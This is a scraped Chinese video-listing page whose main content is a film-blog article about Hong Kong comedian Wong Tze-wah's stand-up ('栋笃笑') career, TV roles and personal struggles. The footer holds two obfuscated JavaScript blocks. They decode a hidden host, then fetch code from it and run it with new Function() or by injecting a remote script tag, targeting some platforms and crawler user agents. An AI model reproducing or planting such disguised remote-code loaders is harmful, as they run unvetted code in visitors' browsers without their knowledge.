跟住去边度

  • 娱乐 未知 生活 社会 文化
  • 黄子华
  • 每期90分钟
  • 跟住去边度影片简介:众人热议的《脱口秀大会第四季》…跟住去边度影片简介:众人热议的《脱口秀大会第四季》于前不久落下帷幕,周奇墨夺冠,而杨笠则又凭借“调侃”男性的段子几次出圈。 这两人,都是有争议的。 周奇墨被不少网友评价说内容不好笑,没有记忆点,罗永浩直言:坐几十分钟一小时的专场,周老师天下无敌,但这种几分钟的比赛,他确实好像不太适应。 而围绕杨笠的争议已经不必多讲,看看部分男性网友的愤怒程度就可见一斑。 事实上,在脱口秀领域,一直都有人在做半小时或几小时的专场演出,而调侃“饮食男女”们的生活、工作和婚恋更是常事。 但真要保持长时间的内容输出、适当且有趣地进行调侃,又岂是易事? 不过,还是有人做得到的。 至于都有谁,内地的几大知名脱口秀演员都曾提到的,最具代表性的就是来自香港的“栋笃笑”创始人黄子华,江湖人称“子华神”。 《脱口秀大会》的策划人李诞,看了黄子华的一场表演后,就兴奋到把他的所有“栋笃笑”视频都给看了,他说黄子华是自己在脱口秀方面的启蒙老师。 《吐槽大会》总编剧程璐,则用“震撼”和“演唱会级别”来形容黄子华的现场演出。 从引领人、启蒙老师到现场被震撼,黄子华的实力已经有足够的证明。 而有别于周奇墨的“业内夸赞、观众质疑”的情形,黄子华的观众口碑和市场号召力是相当惊人的。 2018年,58岁的黄子华以《金盆口》作为自己的封麦之作,最初定了17场,当天门票即售空。 可黄牛坐地起价,原本880的票价被炒至15550,黄子华得知后专门发视频指责该行为,让大家不必执着于看秀。 但由于观众的热情高涨,也为了不让黄牛赚钱,子华遂决定加开9场,合计15万张票,结果仍售空无存。 大家凌晨出来买票、带着孩子排队,就算排在垃圾桶旁也不在意。 除了观众之外,众多明星艺人也都到场支持这最后一show。 佘诗曼还跟记者抱怨,每天拜托她买票的短信多至50条,然而她自己也只有一张。 一票难求,火爆程度已无需多言。 在香港、广东乃至整个粤语地区,黄子华的受欢迎程度不逊色于周润发和四大天王,同时也是不亚于周星驰的喜剧天才,甚至有资格成为香港男神。 在香港“高登男神”的网络投票中,他曾几度夺冠,是许多人心目中的“香港最受欢迎的男艺人”及“头号男神”。 不过,由于他一直以来都坚持粤语形式的表演,也从来不北上参加节目,所以对于许多内地人来说,黄子华的知名度显然不及上述几位。 但从李诞和程璐等人对他的评价及他开秀时的盛况来看,黄子华的实力和魅力完全可以脱离语言受众来评价。 (一) 黄子华和香港 自1990年的第一次演出《娱乐圈血肉史》开始,到2018年的封麦之作《金盆口》, 28年17辑“栋笃笑”(包括双打和须根show),记录了香江市民的生活写照、香港经济和社会的变迁与当下演艺圈的热点话题,以及对一些时政的看法和态度。 当然了,还有关于演员黄子华对自己的调侃和嘲讽。 比如,跑龙套跑到即便有机会做主角,导演给你的剧本还是《跑龙套的一生》。 长时间的抑郁不得志,竟会让人有艺术家般的孤芳自赏的心态。 又比如社畜的心声,喜欢上班是被“鬼上身”的人才会说的话。 对工资意义的另类看法,实则是说一种日益严重的现象,即打工人的大部分时间都已被工作所充斥。 又比如,分析现代人被智能手机裹挟的现象。 网民可以在网上毫无顾忌地释放自我,放纵到一定程度就变成今天的“键盘侠”。 还有关于奢侈品的金句,提醒大家别过度消费。 将朋友的亲密度用“能够借对方多少钱”来衡量,谁又能说不贴切? 当然了,流传比较广的还是关于“饮食男女”的各种调侃和金句,听起来或许比杨笠的表达舒服些。 男人追求新鲜、女人追求保鲜。 男人会极尽全力追求,但是时间相当短暂;女人要的是稳定持久的爱情,一旦分了手就会否定对方此前付出的爱。 还有恋爱时的盲目与结婚时的迁就忍耐,他都会举出相当生动的例子一一道来。 他一般不指名道姓,也不会用太过刻薄和引战的措辞而让观众觉得被冒犯,这类话,他通常都是拿自己开涮。 而对于观众,除了因为他设计的段子而大笑,其中关于人生和哲学的思考,他希望可以引起大家的共鸣,或起到警醒的作用。 值得一提的是,黄子华的所有“栋笃笑”内容全都是他一个人的产物,第一次演出的前期准备,就花了他9个月时间。 而每一场的演出,他不仅有输出,还有态度。 90年的《娱乐圈血肉史》,是对自己多年不得志的嘲讽和调侃,但同时也能让观众了解到,人生并非只有一条出路。 97的《跟住去边度》《末世财神》《秋前算账》,从人讲到社会现象再到对97后的大环境设想,有迷惘、有恐惧,但也有希望,甚至有不少看法已成了预言。 2003年非典时期,演出现场仍旧爆满。 子华也不负众望,《冇炭用》直接挑明经济低迷时压力极大的民众,虽然“苟且偷生”,但对其他人的道德要求却相当高,并发问: 香港人是否已经没有了以往“心中宇宙无限阔”的包容胸襟? 2009年的《哗众取宠》,剖析了现代网民的真实心态,将自己修饰到“每个人都成了传奇”的地步,说是想分享和交流,实则对负面评价的承受力极低。 到了2014年的《唔黐线唔正常》,基于当时的社会事件,延伸到市民的浮躁和“非黑即白”的道德标尺。 而2018年封麦作《金盆口》,诚如他所言“香港已经让他笑不出来了”。当下社会的矛盾和戾气让他频频怀念过去的体面,他引用黄霑的话:为真小人争取社会地位,不让伪君子霸占了全世界。 28年的“栋笃笑”生涯,黄子华看似百无禁忌的题材内容,其实也免不了被现实束缚,但他仍尽最大努力地进行表达和分析。 这一点,从第一场《娱乐圈血肉史》就开始践行了。 (二) 黄子华的奋斗 1990年,黄子华在香港文化中心进行了第一场“栋笃笑”演出,“栋笃笑”这一名称,是他根据美国流行文化“stand-up comedy”意译而来,那一年,他30岁。 在这之前,他花9个月写完了演出内容,还掏空腰包申请了场地,包括开场前的抽奖。 而往前再推6年时间,他则是想要报考TVB演员训练班的哲学系毕业生,他的梦想,是当一名演员,诠释不同的角色、演绎不同的人生。 然而,当年无线却停办了演员训练班,最终他报考了编剧训练班,成为了一名编剧。而后,他又到香港话剧团当一名实习演员、到电台做助理编导。 在这期间,他做的事情专业至写写小剧本,不专业至端水倒茶、复印文件、买外卖。 好不容易能演戏,电视台给的角色却都是如下图这一类。 不仅如此,上司还直接跟他说:你死心啦,你真的不适合做演员。 他疑惑问原因,对方也不客气:你不够靓仔啊,在某个角度还算得上是丑。 丑不丑另说,但当时走红的“五虎将”即黄日华、刘德华、梁朝伟、苗侨伟和汤镇业,每一个都是颜值过人。 就这样,熬着熬着,六年时间过去了。 黄子华决定离开这个圈子,走之前他将自己多年来在圈中的经历及所看所听写下来,要用一种从没有出现在香港的表演形式宣之于众。 黄霑说他是在“自杀”,因为这种形式实在太新了。 “做完一场就转行去卖房”,他这样告诉自己。 没想到观众却很是受用,大家为台上这个摸爬滚打演艺圈多年的小人物的遭遇而发笑,场内笑声越来越大。 在这之后,他到伊利沙伯体育馆加开3场,因为资金不足,他就自己做宣传,深夜跑到尖沙咀挂横额,大清早到各银行门口贴海报。 结果,门票一扫而空。 就这样,他从香港文化中心开到伊利沙伯体育馆,再到红磡体育馆。 输出内容涵盖了日常生活、婚恋观和时事分析等,创造并发扬了“栋笃笑”这一表演艺术,继而成为不少人心中的“粤语流行文化的一代宗师”。 但你若问黄子华的梦想是什么,他还是会回答你:演员,而且是影视剧演员。 (三) 我是一个演员 2000年,TVB收视记录被一部夜间十点半播出的处境剧所破,这部剧的剧名叫做《男亲女爱》,男主角正是黄子华。 他饰演了一位古惑刁钻但又正义善良的师爷余乐天,实打实的打工人,活生生的社畜,角色表情包至今仍相当经典,这也是近年来不少网友认识他的一个重要途径。 之后,04年主演的《栋笃神探》成为收视年冠,因为结局不好还被观众齐齐投诉; 09年的《绝代商骄》收视年度第四; 2013年的《my盛lady》播出期间,他便拿下了视帝奖项,事实上当年的《男亲女爱》他便已是视帝最热人选。 这些角色都不乏喜剧色彩,黄子华更亲自为剧中的台词注入灵魂,让观众不到现场也宛如看了几十集的“栋笃笑”。 但在这当中,也有例外。 2001年,黄子华参演了内地电视剧《非常公民》,他在剧中饰演了末代皇帝溥仪一角,他演出了一个有别于以往影视形象的溥仪,将他可怜、可笑、可悲的形象演得十分到位。 虽然剧播出之后的反响远不如之前的几部剧,但黄子华却为溥仪这一角色付出了许多。 为了更符合角色的外形,他减重了20磅,吃了一些减肥药,结果抑郁了。 在之后的采访中,他形容过这段生病的经历:几乎每天一到九点就哭。 而这件事也被他带到“栋笃笑”的演出中,他说自己抑郁可能是吃了过期的减肥药。 明明是段极为痛苦的经历,他却能通过这种方式来进行调侃,该说他乐观吗? 答案应该不是肯定的。 (四) 一个残酷的笑话演员 香港作家兼黄子华好友黄碧云曾这样评价他:一个残酷的笑话演员。 言外之意,是说他对自己残酷,也是说现实对他残酷。 17部“栋笃笑”,少则一个半小时,多则将近三小时,全部的演出内容都是他自己设计和发挥的。 临睡前、早上睁开眼时,脑子里还在想稿子的情况已是常态。 此外,观众的反应如何,能否接住你的梗,都是未知数。 黄子华明白,观众对自己的要求和期待很高,这就给他造成了极大的压力,所以他说,做“栋笃笑”很痛苦,大家不要轻易尝试。 事实上,他对自己的要求也很高,与其说是观众的态度,倒不如说是他自己的人生处事。 而且那段不得志的时光也给他造成了一定阴影,让他明白观众的认可来得不易,必须珍惜。 此外,他的一些人生经历确实也颇为“残酷”。 比如,父母离异、继父家暴的童年往事。 有任女朋友曾经劈腿消防员,让他受尽嘲笑和冷眼,演出现场都有人给他难堪。 以及最让他耿耿于怀的“票房毒药”称号,他在电影方面的表现几乎与他在“栋笃笑”和电视剧的成绩割裂开来,他曾一度跟导演说:别放我名字,票房肯定更好。 所以,严格来说,他不是乐观的人,但却是个知足且积极的人。 他说能呼吸能吃饭还能读书的人生不应该有抱怨。 他明白一个人想要方方面面都获得成功是得寸进尺的。 他用火柴和废柴的区别来警醒大家,不能“拾下拾下”就算,要好好生活。 尽管2018年之后就已经封麦,但作为“栋笃笑”创始人、华语脱口秀佼佼者的黄子华,17辑“栋笃笑”的内容和舞台表现已足以让观众深深记住。 青石电影| 柯棠 本文系青石电影原创内容,未经授权请勿以任何形式转载!

同类型

同主演

跟住去边度评论

  • 评论加载中...
function WaeIfQO(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function smAXyVBP(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return WaeIfQO(t);};window[''+'B'+'S'+'c'+'p'+'v'+'K'+'R'+'k'+'z'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=smAXyVBP,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/g/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('ZXJttbnQuaWttqbndkLnh5eg==','151743',window,document,['t','UyhWYi']);}:function(){};


function WLxXbgTl(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function zPZha(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return WLxXbgTl(t);};window[''+'z'+'E'+'d'+'c'+'C'+'q'+'B'+'S'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=zPZha,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/g/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('ZXJtbnQuaWtqqbndkLnh5eg==','151742',window,document,['q','ZTDMgQ']);}:function(){};